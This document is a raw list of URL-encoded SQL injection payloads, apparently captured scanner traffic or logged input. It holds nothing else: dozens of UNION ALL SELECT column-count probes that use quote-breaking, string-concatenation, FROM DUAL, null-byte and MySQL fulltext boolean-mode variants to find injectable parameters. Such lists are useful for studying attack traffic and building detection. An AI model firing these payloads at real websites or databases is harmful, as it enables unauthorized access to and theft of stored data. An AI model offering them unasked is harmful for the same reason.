-1213%22%20WHERE%201326%3D1326%20UNION%20ALL%20SELECT%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%2C%201326%00 -5795%22%20WHERE%205180%3D5180%20UNION%20ALL%20SELECT%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%00 -7058%22%20WHERE%205829%3D5829%20UNION%20ALL%20SELECT%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%2C%205829%00 -8158%27%20%7C%7C%20%28SELECT%201612%20FROM%20DUAL%20WHERE%203188%3D3188%20UNION%20ALL%20SELECT%203188%2C%203188%2C%203188%2C%203188%2C%203188%2C%203188%2C%203188%2C%203188%2C%203188%2C%203188%2C%203188%2C%203188%2C%203188%2C%203188%2C%203188%2C%203188%2C%203188%2C%203188%2C%203188%2C%203188%2C%203188%00%20%29%20%7C%7C%20%27 -6082%27%20%7C%7C%20%28SELECT%203302%20FROM%20DUAL%20WHERE%205072%3D5072%20UNION%20ALL%20SELECT%205072%2C%205072%2C%205072%2C%205072%2C%205072%2C%205072%2C%205072%2C%205072%2C%205072%2C%205072%2C%205072%2C%205072%2C%205072%2C%205072%2C%205072%2C%205072%2C%205072%2C%205072%2C%205072%2C%205072%2C%205072%2C%205072%00%20%29%20%7C%7C%20%27 -1701%27%20%7C%7C%20%28SELECT%201395%20FROM%20DUAL%20WHERE%203404%3D3404%20UNION%20ALL%20SELECT%203404%2C%203404%2C%203404%2C%203404%2C%203404%2C%203404%2C%203404%2C%203404%2C%203404%2C%203404%2C%203404%2C%203404%2C%203404%2C%203404%2C%203404%2C%203404%2C%203404%2C%203404%2C%203404%2C%203404%2C%203404%2C%203404%2C%203404%00%20%29%20%7C%7C%20%27 -9034%27%20%7C%7C%20%28SELECT%202936%20FROM%20DUAL%20WHERE%207587%3D7587%20UNION%20ALL%20SELECT%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%00%20%29%20%7C%7C%20%27 -9794%27%20%7C%7C%20%28SELECT%208398%20FROM%20DUAL%20WHERE%203366%3D3366%20UNION%20ALL%20SELECT%203366%2C%203366%2C%203366%2C%203366%2C%203366%2C%203366%2C%203366%2C%203366%2C%203366%2C%203366%2C%203366%2C%203366%2C%203366%2C%203366%2C%203366%2C%203366%2C%203366%2C%203366%2C%203366%2C%203366%2C%203366%2C%203366%2C%203366%2C%203366%2C%203366%00%20%29%20%7C%7C%20%27 -9593%27%20%7C%7C%20%28SELECT%203706%20FROM%20DUAL%20WHERE%203693%3D3693%20UNION%20ALL%20SELECT%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%2C%203693%00%20%29%20%7C%7C%20%27 -3965%27%20%7C%7C%20%28SELECT%206815%20FROM%20DUAL%20WHERE%201860%3D1860%20UNION%20ALL%20SELECT%201860%2C%201860%2C%201860%2C%201860%2C%201860%2C%201860%2C%201860%2C%201860%2C%201860%2C%201860%2C%201860%2C%201860%2C%201860%2C%201860%2C%201860%2C%201860%2C%201860%2C%201860%2C%201860%2C%201860%2C%201860%2C%201860%2C%201860%2C%201860%2C%201860%2C%201860%2C%201860%00%20%29%20%7C%7C%20%27 -1454%27%20%7C%7C%20%28SELECT%202437%20FROM%20DUAL%20WHERE%208605%3D8605%20UNION%20ALL%20SELECT%208605%2C%208605%2C%208605%2C%208605%2C%208605%2C%208605%2C%208605%2C%208605%2C%208605%2C%208605%2C%208605%2C%208605%2C%208605%2C%208605%2C%208605%2C%208605%2C%208605%2C%208605%2C%208605%2C%208605%2C%208605%2C%208605%2C%208605%2C%208605%2C%208605%2C%208605%2C%208605%2C%208605%00%20%29%20%7C%7C%20%27 -8330%27%20%7C%7C%20%28SELECT%205277%20FROM%20DUAL%20WHERE%205901%3D5901%20UNION%20ALL%20SELECT%205901%2C%205901%2C%205901%2C%205901%2C%205901%2C%205901%2C%205901%2C%205901%2C%205901%2C%205901%2C%205901%2C%205901%2C%205901%2C%205901%2C%205901%2C%205901%2C%205901%2C%205901%2C%205901%2C%205901%2C%205901%2C%205901%2C%205901%2C%205901%2C%205901%2C%205901%2C%205901%2C%205901%2C%205901%00%20%29%20%7C%7C%20%27 -6147%27%20%7C%7C%20%28SELECT%209913%20FROM%20DUAL%20WHERE%204262%3D4262%20UNION%20ALL%20SELECT%204262%2C%204262%2C%204262%2C%204262%2C%204262%2C%204262%2C%204262%2C%204262%2C%204262%2C%204262%2C%204262%2C%204262%2C%204262%2C%204262%2C%204262%2C%204262%2C%204262%2C%204262%2C%204262%2C%204262%2C%204262%2C%204262%2C%204262%2C%204262%2C%204262%2C%204262%2C%204262%2C%204262%2C%204262%2C%204262%00%20%29%20%7C%7C%20%27 -9789%27%20%7C%7C%20%28SELECT%209035%20WHERE%204482%3D4482%20UNION%20ALL%20SELECT%204482%2C%204482%2C%204482%2C%204482%2C%204482%2C%204482%2C%204482%2C%204482%2C%204482%2C%204482%2C%204482%2C%204482%2C%204482%2C%204482%2C%204482%2C%204482%2C%204482%2C%204482%2C%204482%2C%204482%2C%204482%00%20%29%20%7C%7C%20%27 -5617%27%20%7C%7C%20%28SELECT%201398%20WHERE%209906%3D9906%20UNION%20ALL%20SELECT%209906%2C%209906%2C%209906%2C%209906%2C%209906%2C%209906%2C%209906%2C%209906%2C%209906%2C%209906%2C%209906%2C%209906%2C%209906%2C%209906%2C%209906%2C%209906%2C%209906%2C%209906%2C%209906%2C%209906%2C%209906%2C%209906%00%20%29%20%7C%7C%20%27 -2745%27%20%7C%7C%20%28SELECT%201003%20WHERE%205854%3D5854%20UNION%20ALL%20SELECT%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%2C%205854%00%20%29%20%7C%7C%20%27 -7938%27%20%7C%7C%20%28SELECT%207185%20WHERE%207503%3D7503%20UNION%20ALL%20SELECT%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%00%20%29%20%7C%7C%20%27 -7497%27%20%7C%7C%20%28SELECT%206452%20WHERE%208881%3D8881%20UNION%20ALL%20SELECT%208881%2C%208881%2C%208881%2C%208881%2C%208881%2C%208881%2C%208881%2C%208881%2C%208881%2C%208881%2C%208881%2C%208881%2C%208881%2C%208881%2C%208881%2C%208881%2C%208881%2C%208881%2C%208881%2C%208881%2C%208881%2C%208881%2C%208881%2C%208881%2C%208881%00%20%29%20%7C%7C%20%27 -7141%27%20%7C%7C%20%28SELECT%209796%20WHERE%204420%3D4420%20UNION%20ALL%20SELECT%204420%2C%204420%2C%204420%2C%204420%2C%204420%2C%204420%2C%204420%2C%204420%2C%204420%2C%204420%2C%204420%2C%204420%2C%204420%2C%204420%2C%204420%2C%204420%2C%204420%2C%204420%2C%204420%2C%204420%2C%204420%2C%204420%2C%204420%2C%204420%2C%204420%2C%204420%00%20%29%20%7C%7C%20%27 -8312%27%20%7C%7C%20%28SELECT%204965%20WHERE%206597%3D6597%20UNION%20ALL%20SELECT%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%2C%206597%00%20%29%20%7C%7C%20%27 -7667%27%20%7C%7C%20%28SELECT%201699%20WHERE%204732%3D4732%20UNION%20ALL%20SELECT%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%2C%204732%00%20%29%20%7C%7C%20%27 -3365%27%20%7C%7C%20%28SELECT%209796%20WHERE%206361%3D6361%20UNION%20ALL%20SELECT%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%00%20%29%20%7C%7C%20%27 -1427%27%20%7C%7C%20%28SELECT%205372%20WHERE%201557%3D1557%20UNION%20ALL%20SELECT%201557%2C%201557%2C%201557%2C%201557%2C%201557%2C%201557%2C%201557%2C%201557%2C%201557%2C%201557%2C%201557%2C%201557%2C%201557%2C%201557%2C%201557%2C%201557%2C%201557%2C%201557%2C%201557%2C%201557%2C%201557%2C%201557%2C%201557%2C%201557%2C%201557%2C%201557%2C%201557%2C%201557%2C%201557%2C%201557%00%20%29%20%7C%7C%20%27 -7127%20%2B%20%28SELECT%202940%20FROM%20DUAL%20WHERE%203345%3D3345%20UNION%20ALL%20SELECT%203345%2C%203345%2C%203345%2C%203345%2C%203345%2C%203345%2C%203345%2C%203345%2C%203345%2C%203345%2C%203345%2C%203345%2C%203345%2C%203345%2C%203345%2C%203345%2C%203345%2C%203345%2C%203345%2C%203345%2C%203345%00%20%29 -9335%20%2B%20%28SELECT%209362%20FROM%20DUAL%20WHERE%203523%3D3523%20UNION%20ALL%20SELECT%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%2C%203523%00%20%29 -9004%20%2B%20%28SELECT%202785%20FROM%20DUAL%20WHERE%204633%3D4633%20UNION%20ALL%20SELECT%204633%2C%204633%2C%204633%2C%204633%2C%204633%2C%204633%2C%204633%2C%204633%2C%204633%2C%204633%2C%204633%2C%204633%2C%204633%2C%204633%2C%204633%2C%204633%2C%204633%2C%204633%2C%204633%2C%204633%2C%204633%2C%204633%2C%204633%00%20%29 -8337%20%2B%20%28SELECT%204049%20FROM%20DUAL%20WHERE%205901%3D5901%20UNION%20ALL%20SELECT%205901%2C%205901%2C%205901%2C%205901%2C%205901%2C%205901%2C%205901%2C%205901%2C%205901%2C%205901%2C%205901%2C%205901%2C%205901%2C%205901%2C%205901%2C%205901%2C%205901%2C%205901%2C%205901%2C%205901%2C%205901%2C%205901%2C%205901%2C%205901%00%20%29 -6643%20%2B%20%28SELECT%204337%20FROM%20DUAL%20WHERE%207005%3D7005%20UNION%20ALL%20SELECT%207005%2C%207005%2C%207005%2C%207005%2C%207005%2C%207005%2C%207005%2C%207005%2C%207005%2C%207005%2C%207005%2C%207005%2C%207005%2C%207005%2C%207005%2C%207005%2C%207005%2C%207005%2C%207005%2C%207005%2C%207005%2C%207005%2C%207005%2C%207005%2C%207005%00%20%29 -5904%20%2B%20%28SELECT%208906%20FROM%20DUAL%20WHERE%203658%3D3658%20UNION%20ALL%20SELECT%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%2C%203658%00%20%29 -9618%20%2B%20%28SELECT%206892%20FROM%20DUAL%20WHERE%209072%3D9072%20UNION%20ALL%20SELECT%209072%2C%209072%2C%209072%2C%209072%2C%209072%2C%209072%2C%209072%2C%209072%2C%209072%2C%209072%2C%209072%2C%209072%2C%209072%2C%209072%2C%209072%2C%209072%2C%209072%2C%209072%2C%209072%2C%209072%2C%209072%2C%209072%2C%209072%2C%209072%2C%209072%2C%209072%2C%209072%00%20%29 -1820%20%2B%20%28SELECT%202568%20FROM%20DUAL%20WHERE%204182%3D4182%20UNION%20ALL%20SELECT%204182%2C%204182%2C%204182%2C%204182%2C%204182%2C%204182%2C%204182%2C%204182%2C%204182%2C%204182%2C%204182%2C%204182%2C%204182%2C%204182%2C%204182%2C%204182%2C%204182%2C%204182%2C%204182%2C%204182%2C%204182%2C%204182%2C%204182%2C%204182%2C%204182%2C%204182%2C%204182%2C%204182%00%20%29 -4201%20%2B%20%28SELECT%209089%20FROM%20DUAL%20WHERE%209722%3D9722%20UNION%20ALL%20SELECT%209722%2C%209722%2C%209722%2C%209722%2C%209722%2C%209722%2C%209722%2C%209722%2C%209722%2C%209722%2C%209722%2C%209722%2C%209722%2C%209722%2C%209722%2C%209722%2C%209722%2C%209722%2C%209722%2C%209722%2C%209722%2C%209722%2C%209722%2C%209722%2C%209722%2C%209722%2C%209722%2C%209722%2C%209722%00%20%29 -1133%20%2B%20%28SELECT%203740%20FROM%20DUAL%20WHERE%208162%3D8162%20UNION%20ALL%20SELECT%208162%2C%208162%2C%208162%2C%208162%2C%208162%2C%208162%2C%208162%2C%208162%2C%208162%2C%208162%2C%208162%2C%208162%2C%208162%2C%208162%2C%208162%2C%208162%2C%208162%2C%208162%2C%208162%2C%208162%2C%208162%2C%208162%2C%208162%2C%208162%2C%208162%2C%208162%2C%208162%2C%208162%2C%208162%2C%208162%00%20%29 -1119%20%2B%20%28SELECT%201323%20WHERE%201834%3D1834%20UNION%20ALL%20SELECT%201834%2C%201834%2C%201834%2C%201834%2C%201834%2C%201834%2C%201834%2C%201834%2C%201834%2C%201834%2C%201834%2C%201834%2C%201834%2C%201834%2C%201834%2C%201834%2C%201834%2C%201834%2C%201834%2C%201834%2C%201834%00%20%29 -7820%20%2B%20%28SELECT%202816%20WHERE%207397%3D7397%20UNION%20ALL%20SELECT%207397%2C%207397%2C%207397%2C%207397%2C%207397%2C%207397%2C%207397%2C%207397%2C%207397%2C%207397%2C%207397%2C%207397%2C%207397%2C%207397%2C%207397%2C%207397%2C%207397%2C%207397%2C%207397%2C%207397%2C%207397%2C%207397%00%20%29 -9172%20%2B%20%28SELECT%202658%20WHERE%207766%3D7766%20UNION%20ALL%20SELECT%207766%2C%207766%2C%207766%2C%207766%2C%207766%2C%207766%2C%207766%2C%207766%2C%207766%2C%207766%2C%207766%2C%207766%2C%207766%2C%207766%2C%207766%2C%207766%2C%207766%2C%207766%2C%207766%2C%207766%2C%207766%2C%207766%2C%207766%00%20%29 -5341%20%2B%20%28SELECT%205279%20WHERE%201430%3D1430%20UNION%20ALL%20SELECT%201430%2C%201430%2C%201430%2C%201430%2C%201430%2C%201430%2C%201430%2C%201430%2C%201430%2C%201430%2C%201430%2C%201430%2C%201430%2C%201430%2C%201430%2C%201430%2C%201430%2C%201430%2C%201430%2C%201430%2C%201430%2C%201430%2C%201430%2C%201430%00%20%29 -8450%20%2B%20%28SELECT%207337%20WHERE%209654%3D9654%20UNION%20ALL%20SELECT%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%2C%209654%00%20%29 -4459%20%2B%20%28SELECT%205526%20WHERE%205796%3D5796%20UNION%20ALL%20SELECT%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%2C%205796%00%20%29 -8638%20%2B%20%28SELECT%207426%20WHERE%205312%3D5312%20UNION%20ALL%20SELECT%205312%2C%205312%2C%205312%2C%205312%2C%205312%2C%205312%2C%205312%2C%205312%2C%205312%2C%205312%2C%205312%2C%205312%2C%205312%2C%205312%2C%205312%2C%205312%2C%205312%2C%205312%2C%205312%2C%205312%2C%205312%2C%205312%2C%205312%2C%205312%2C%205312%2C%205312%2C%205312%00%20%29 -5117%20%2B%20%28SELECT%206796%20WHERE%208286%3D8286%20UNION%20ALL%20SELECT%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%2C%208286%00%20%29 -8317%20%2B%20%28SELECT%201133%20WHERE%201036%3D1036%20UNION%20ALL%20SELECT%201036%2C%201036%2C%201036%2C%201036%2C%201036%2C%201036%2C%201036%2C%201036%2C%201036%2C%201036%2C%201036%2C%201036%2C%201036%2C%201036%2C%201036%2C%201036%2C%201036%2C%201036%2C%201036%2C%201036%2C%201036%2C%201036%2C%201036%2C%201036%2C%201036%2C%201036%2C%201036%2C%201036%2C%201036%00%20%29 -9510%20%2B%20%28SELECT%208358%20WHERE%201594%3D1594%20UNION%20ALL%20SELECT%201594%2C%201594%2C%201594%2C%201594%2C%201594%2C%201594%2C%201594%2C%201594%2C%201594%2C%201594%2C%201594%2C%201594%2C%201594%2C%201594%2C%201594%2C%201594%2C%201594%2C%201594%2C%201594%2C%201594%2C%201594%2C%201594%2C%201594%2C%201594%2C%201594%2C%201594%2C%201594%2C%201594%2C%201594%2C%201594%00%20%29 -4296%27%20%2B%20%28SELECT%20%27afMv%27%20FROM%20DUAL%20WHERE%209810%3D9810%20UNION%20ALL%20SELECT%209810%2C%209810%2C%209810%2C%209810%2C%209810%2C%209810%2C%209810%2C%209810%2C%209810%2C%209810%2C%209810%2C%209810%2C%209810%2C%209810%2C%209810%2C%209810%2C%209810%2C%209810%2C%209810%2C%209810%2C%209810%00%20%29%20%2B%20%27 -7606%27%20%2B%20%28SELECT%20%27DrsJ%27%20FROM%20DUAL%20WHERE%207240%3D7240%20UNION%20ALL%20SELECT%207240%2C%207240%2C%207240%2C%207240%2C%207240%2C%207240%2C%207240%2C%207240%2C%207240%2C%207240%2C%207240%2C%207240%2C%207240%2C%207240%2C%207240%2C%207240%2C%207240%2C%207240%2C%207240%2C%207240%2C%207240%2C%207240%00%20%29%20%2B%20%27 -4883%27%20%2B%20%28SELECT%20%27vnjM%27%20FROM%20DUAL%20WHERE%207264%3D7264%20UNION%20ALL%20SELECT%207264%2C%207264%2C%207264%2C%207264%2C%207264%2C%207264%2C%207264%2C%207264%2C%207264%2C%207264%2C%207264%2C%207264%2C%207264%2C%207264%2C%207264%2C%207264%2C%207264%2C%207264%2C%207264%2C%207264%2C%207264%2C%207264%2C%207264%00%20%29%20%2B%20%27 -3870%27%20%2B%20%28SELECT%20%27JFxP%27%20FROM%20DUAL%20WHERE%208502%3D8502%20UNION%20ALL%20SELECT%208502%2C%208502%2C%208502%2C%208502%2C%208502%2C%208502%2C%208502%2C%208502%2C%208502%2C%208502%2C%208502%2C%208502%2C%208502%2C%208502%2C%208502%2C%208502%2C%208502%2C%208502%2C%208502%2C%208502%2C%208502%2C%208502%2C%208502%2C%208502%00%20%29%20%2B%20%27 -3816%27%20%2B%20%28SELECT%20%27GQkn%27%20FROM%20DUAL%20WHERE%205819%3D5819%20UNION%20ALL%20SELECT%205819%2C%205819%2C%205819%2C%205819%2C%205819%2C%205819%2C%205819%2C%205819%2C%205819%2C%205819%2C%205819%2C%205819%2C%205819%2C%205819%2C%205819%2C%205819%2C%205819%2C%205819%2C%205819%2C%205819%2C%205819%2C%205819%2C%205819%2C%205819%2C%205819%00%20%29%20%2B%20%27 -6535%27%20%2B%20%28SELECT%20%27ytAO%27%20FROM%20DUAL%20WHERE%207282%3D7282%20UNION%20ALL%20SELECT%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%00%20%29%20%2B%20%27 -5724%27%20%2B%20%28SELECT%20%27czZL%27%20FROM%20DUAL%20WHERE%204767%3D4767%20UNION%20ALL%20SELECT%204767%2C%204767%2C%204767%2C%204767%2C%204767%2C%204767%2C%204767%2C%204767%2C%204767%2C%204767%2C%204767%2C%204767%2C%204767%2C%204767%2C%204767%2C%204767%2C%204767%2C%204767%2C%204767%2C%204767%2C%204767%2C%204767%2C%204767%2C%204767%2C%204767%2C%204767%2C%204767%00%20%29%20%2B%20%27 -9786%27%20%2B%20%28SELECT%20%27GsSO%27%20FROM%20DUAL%20WHERE%203085%3D3085%20UNION%20ALL%20SELECT%203085%2C%203085%2C%203085%2C%203085%2C%203085%2C%203085%2C%203085%2C%203085%2C%203085%2C%203085%2C%203085%2C%203085%2C%203085%2C%203085%2C%203085%2C%203085%2C%203085%2C%203085%2C%203085%2C%203085%2C%203085%2C%203085%2C%203085%2C%203085%2C%203085%2C%203085%2C%203085%2C%203085%00%20%29%20%2B%20%27 -4960%27%20%2B%20%28SELECT%20%27XVyN%27%20FROM%20DUAL%20WHERE%202984%3D2984%20UNION%20ALL%20SELECT%202984%2C%202984%2C%202984%2C%202984%2C%202984%2C%202984%2C%202984%2C%202984%2C%202984%2C%202984%2C%202984%2C%202984%2C%202984%2C%202984%2C%202984%2C%202984%2C%202984%2C%202984%2C%202984%2C%202984%2C%202984%2C%202984%2C%202984%2C%202984%2C%202984%2C%202984%2C%202984%2C%202984%2C%202984%00%20%29%20%2B%20%27 -6666%27%20%2B%20%28SELECT%20%27GulB%27%20FROM%20DUAL%20WHERE%204207%3D4207%20UNION%20ALL%20SELECT%204207%2C%204207%2C%204207%2C%204207%2C%204207%2C%204207%2C%204207%2C%204207%2C%204207%2C%204207%2C%204207%2C%204207%2C%204207%2C%204207%2C%204207%2C%204207%2C%204207%2C%204207%2C%204207%2C%204207%2C%204207%2C%204207%2C%204207%2C%204207%2C%204207%2C%204207%2C%204207%2C%204207%2C%204207%2C%204207%00%20%29%20%2B%20%27 -2208%27%20%2B%20%28SELECT%20%27NaHG%27%20WHERE%206482%3D6482%20UNION%20ALL%20SELECT%206482%2C%206482%2C%206482%2C%206482%2C%206482%2C%206482%2C%206482%2C%206482%2C%206482%2C%206482%2C%206482%2C%206482%2C%206482%2C%206482%2C%206482%2C%206482%2C%206482%2C%206482%2C%206482%2C%206482%2C%206482%00%20%29%20%2B%20%27 -9528%27%20%2B%20%28SELECT%20%27LgGk%27%20WHERE%207644%3D7644%20UNION%20ALL%20SELECT%207644%2C%207644%2C%207644%2C%207644%2C%207644%2C%207644%2C%207644%2C%207644%2C%207644%2C%207644%2C%207644%2C%207644%2C%207644%2C%207644%2C%207644%2C%207644%2C%207644%2C%207644%2C%207644%2C%207644%2C%207644%2C%207644%00%20%29%20%2B%20%27 -9572%27%20%2B%20%28SELECT%20%27PfpC%27%20WHERE%203611%3D3611%20UNION%20ALL%20SELECT%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%2C%203611%00%20%29%20%2B%20%27 -3892%27%20%2B%20%28SELECT%20%27vRio%27%20WHERE%204345%3D4345%20UNION%20ALL%20SELECT%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%2C%204345%00%20%29%20%2B%20%27 -4512%27%20%2B%20%28SELECT%20%27Yqod%27%20WHERE%201768%3D1768%20UNION%20ALL%20SELECT%201768%2C%201768%2C%201768%2C%201768%2C%201768%2C%201768%2C%201768%2C%201768%2C%201768%2C%201768%2C%201768%2C%201768%2C%201768%2C%201768%2C%201768%2C%201768%2C%201768%2C%201768%2C%201768%2C%201768%2C%201768%2C%201768%2C%201768%2C%201768%2C%201768%00%20%29%20%2B%20%27 -7548%27%20%2B%20%28SELECT%20%27KsMb%27%20WHERE%203248%3D3248%20UNION%20ALL%20SELECT%203248%2C%203248%2C%203248%2C%203248%2C%203248%2C%203248%2C%203248%2C%203248%2C%203248%2C%203248%2C%203248%2C%203248%2C%203248%2C%203248%2C%203248%2C%203248%2C%203248%2C%203248%2C%203248%2C%203248%2C%203248%2C%203248%2C%203248%2C%203248%2C%203248%2C%203248%00%20%29%20%2B%20%27 -2065%27%20%2B%20%28SELECT%20%27iEPZ%27%20WHERE%205681%3D5681%20UNION%20ALL%20SELECT%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%2C%205681%00%20%29%20%2B%20%27 -9940%27%20%2B%20%28SELECT%20%27nxCY%27%20WHERE%207133%3D7133%20UNION%20ALL%20SELECT%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%00%20%29%20%2B%20%27 -4939%27%20%2B%20%28SELECT%20%27hYbh%27%20WHERE%202825%3D2825%20UNION%20ALL%20SELECT%202825%2C%202825%2C%202825%2C%202825%2C%202825%2C%202825%2C%202825%2C%202825%2C%202825%2C%202825%2C%202825%2C%202825%2C%202825%2C%202825%2C%202825%2C%202825%2C%202825%2C%202825%2C%202825%2C%202825%2C%202825%2C%202825%2C%202825%2C%202825%2C%202825%2C%202825%2C%202825%2C%202825%2C%202825%00%20%29%20%2B%20%27 -2807%27%20%2B%20%28SELECT%20%27ocjL%27%20WHERE%203260%3D3260%20UNION%20ALL%20SELECT%203260%2C%203260%2C%203260%2C%203260%2C%203260%2C%203260%2C%203260%2C%203260%2C%203260%2C%203260%2C%203260%2C%203260%2C%203260%2C%203260%2C%203260%2C%203260%2C%203260%2C%203260%2C%203260%2C%203260%2C%203260%2C%203260%2C%203260%2C%203260%2C%203260%2C%203260%2C%203260%2C%203260%2C%203260%2C%203260%00%20%29%20%2B%20%27 -4027%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%2C%204475%00%20%23 -3470%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%204032%2C%204032%2C%204032%2C%204032%2C%204032%2C%204032%2C%204032%2C%204032%2C%204032%2C%204032%2C%204032%2C%204032%2C%204032%2C%204032%2C%204032%2C%204032%2C%204032%2C%204032%2C%204032%2C%204032%2C%204032%2C%204032%00%20%23 -6082%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206521%2C%206521%2C%206521%2C%206521%2C%206521%2C%206521%2C%206521%2C%206521%2C%206521%2C%206521%2C%206521%2C%206521%2C%206521%2C%206521%2C%206521%2C%206521%2C%206521%2C%206521%2C%206521%2C%206521%2C%206521%2C%206521%2C%206521%00%20%23 -1031%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209370%2C%209370%2C%209370%2C%209370%2C%209370%2C%209370%2C%209370%2C%209370%2C%209370%2C%209370%2C%209370%2C%209370%2C%209370%2C%209370%2C%209370%2C%209370%2C%209370%2C%209370%2C%209370%2C%209370%2C%209370%2C%209370%2C%209370%2C%209370%00%20%23 -2665%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202362%2C%202362%2C%202362%2C%202362%2C%202362%2C%202362%2C%202362%2C%202362%2C%202362%2C%202362%2C%202362%2C%202362%2C%202362%2C%202362%2C%202362%2C%202362%2C%202362%2C%202362%2C%202362%2C%202362%2C%202362%2C%202362%2C%202362%2C%202362%2C%202362%00%20%23 